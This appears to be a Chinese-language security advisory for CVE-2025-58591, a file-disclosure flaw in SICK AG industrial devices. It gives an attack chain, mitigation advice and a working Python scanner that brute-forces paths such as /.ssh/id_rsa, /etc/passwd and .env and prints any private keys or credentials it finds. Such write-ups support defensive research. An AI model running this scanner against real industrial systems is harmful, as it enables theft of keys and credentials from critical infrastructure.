CVE-2025-58591：SICK工业产品目录遍历与敏感文件泄露漏洞

漏洞信息

漏洞编号

CVE-2025-58591

漏洞类型

目录遍历/敏感信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

SICK AG 工业传感器及自动化产品

漏洞概述

CVE-2025-58591是SICK AG（德国西克公司）工业自动化与传感器产品中发现的一个中危安全漏洞，CVSS 3.1评分为6.5。该漏洞由SICK产品安全事件响应团队（PSIRT）发现并报告，披露日期为2025年10月6日。SICK AG是全球领先的工业传感器、安全系统和自动化解决方案供应商，其产品广泛应用于制造业、物流、过程自动化等领域。该漏洞的核心问题在于，远程未经授权的攻击者可以通过暴力枚举（brute force）方式猜测应用服务器上的文件夹名称和文件名，从而读取到诸如私钥（private keys）、配置文件（configurations）等敏感信息。这种信息泄露漏洞虽然不会直接导致系统完整性破坏或服务中断，但攻击者获取的敏感数据（如私钥）可能被用于后续更高级的攻击活动，例如中间人攻击、身份伪造或横向移动。考虑到SICK产品多部署于工业控制环境（ICS/OT），此类敏感信息泄露对工业生产环境的安全构成潜在威胁。攻击者只需要低权限（PR:L）即可通过网络远程利用该漏洞，无需用户交互，具有较高的可利用性。该漏洞已被CISA纳入ICS安全推荐实践范畴，凸显了其对关键基础设施安全的关注。

技术细节

CVE-2025-58591的漏洞原理主要涉及Web应用服务器对静态资源访问控制的不足。具体技术细节如下：

1. **漏洞根因**：受影响产品的Web服务器或应用接口未对目录列表（directory listing）进行适当限制，同时缺乏针对敏感文件的访问控制机制。服务器允许攻击者通过HTTP请求遍历或猜测常见的文件夹路径和文件名。

2. **利用方式**：攻击者利用自动化工具（如dirbuster、dirb、gobuster等目录扫描工具）对目标服务器发起大量HTTP请求，尝试访问常见路径（如/admin、/config、/.ssh、/keys等）和文件名（如id_rsa、config.xml、settings.json等）。当服务器返回200 OK状态码而非403 Forbidden或404 Not Found时，即表明该文件存在且可被读取。

3. **攻击条件**：根据CVSS向量（CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N），攻击需要网络访问（AV:N）、低复杂度（AC:L）、低权限（PR:L）、无需用户交互（UI:N）。这意味着攻击者可能需要某种形式的初始访问（如已认证的低权限账户）或可访问内部网络。

4. **影响范围**：成功利用后，攻击者可读取私钥文件（用于解密通信或身份认证）、配置文件（包含数据库凭证、系统设置等）、日志文件等敏感信息。虽然该漏洞不直接影响系统完整性和可用性，但泄露的密钥和凭证可被用于后续攻击链构建。

5. **安全风险**：在工业控制环境中，泄露的私钥可能导致设备间通信被解密和篡改，配置文件泄露可能暴露系统架构信息，为后续针对性攻击提供情报支持。

攻击链分析

STEP 1

1. 初始侦察

攻击者通过网络对SICK设备的Web管理界面进行初步侦察，识别目标系统的类型、版本和开放端口。

STEP 2

2. 权限获取

攻击者获取低权限访问凭证（PR:L），可能通过默认凭据、弱口令爆破或社工等方式获得初始访问权限。

STEP 3

3. 目录暴力枚举

使用自动化工具（如dirbuster、gobuster、ffuf等）对目标服务器发起大量HTTP请求，暴力猜测常见的目录路径和文件名。

STEP 4

4. 敏感文件识别

通过分析HTTP响应状态码和内容，识别可访问的敏感文件，如私钥文件（.key、.pem）、配置文件（config.xml、settings.json）等。

STEP 5

5. 敏感信息提取

下载并解析敏感文件内容，提取私钥、数据库凭证、系统配置等关键信息。

STEP 6

6. 后续利用

利用获取的私钥进行通信解密或身份伪造，利用配置信息进行横向移动或构建针对性攻击载荷。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-58591 PoC - Directory/File Brute Force for Sensitive Information Disclosure
# Target: SICK AG industrial products web interface
# Description: This PoC demonstrates how an attacker can brute force directories and files
#              to read sensitive information like private keys and configuration files.

import requests
import sys
from concurrent.futures import ThreadPoolExecutor

TARGET_URL = "https://target-sick-device.example.com"
WORDLIST_PATHS = [
    "/.ssh/id_rsa",
    "/.ssh/id_rsa.pub",
    "/private.key",
    "/server.key",
    "/config.xml",
    "/configuration.xml",
    "/settings.json",
    "/config.json",
    "/admin/config",
    "/etc/passwd",
    "/.env",
    "/backup/config.bak",
    "/keys/private.pem",
    "/certs/server.crt",
    "/web.config",
    "/application.properties",
    "/database.yml",
    "/secrets.yml",
]

def check_path(path):
    """Check if a path exists and is accessible on the target server."""
    url = f"{TARGET_URL}{path}"
    try:
        response = requests.get(url, timeout=5, verify=False,
                                allow_redirects=False)
        if response.status_code == 200 and len(response.content) > 0:
            # Check if response contains sensitive content patterns
            sensitive_patterns = [b"BEGIN RSA", b"BEGIN PRIVATE",
                                  b"BEGIN CERTIFICATE", b"password",
                                  b"secret", b"api_key", b"token"]
            for pattern in sensitive_patterns:
                if pattern in response.content:
                    print(f"[!!! SENSITIVE] {url} - Found: {pattern.decode()}")
                    return (url, response.text)
            print(f"[+] ACCESSIBLE: {url} (Size: {len(response.content)} bytes)")
            return (url, response.text)
    except requests.exceptions.RequestException:
        pass
    return None

def main():
    print(f"[*] Starting directory/file brute force against {TARGET_URL}")
    print(f"[*] Testing {len(WORDLIST_PATHS)} paths...")
    
    results = []
    with ThreadPoolExecutor(max_workers=10) as executor:
        futures = {executor.submit(check_path, path): path
                   for path in WORDLIST_PATHS}
        for future in futures:
            result = future.result()
            if result:
                results.append(result)
    
    print(f"\n[*] Scan complete. Found {len(results)} accessible paths.")
    for url, content in results:
        print(f"\n{'='*60}")
        print(f"URL: {url}")
        print(f"Content preview: {content[:200]}...")

if __name__ == "__main__":
    main()

影响范围

SICK AG 工业传感器及自动化产品（具体受影响版本请参考SICK官方CSAF公告 sca-2025-0010）

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制对设备Web管理界面的网络访问，仅允许可信网络访问；2）修改默认凭据，使用强密码策略；3）在网络层面部署入侵检测系统（IDS）监控异常的目录枚举行为；4）检查并移除Web根目录下的敏感文件，或将其移至非Web可访问的目录；5）配置Web服务器规则，拒绝常见的敏感路径访问请求（如/.ssh/、/private.key等）；6）启用详细的访问日志记录，以便及时发现可疑活动。